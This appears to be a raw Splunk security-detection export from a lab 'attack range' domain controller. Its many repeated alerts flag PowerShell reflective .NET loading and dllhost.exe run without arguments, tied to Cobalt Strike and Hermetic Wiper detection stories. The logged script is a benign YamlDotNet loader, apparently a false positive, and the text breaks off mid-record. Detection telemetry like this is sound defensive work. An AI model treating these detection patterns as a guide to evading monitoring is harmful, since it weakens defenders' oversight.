1665014131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665014131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665014131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665014131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665007200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665007200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4552", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665007200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665007200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x11c8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665010532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T21:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T21:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665010532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T21:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T21:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665010532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T21:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T21:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir 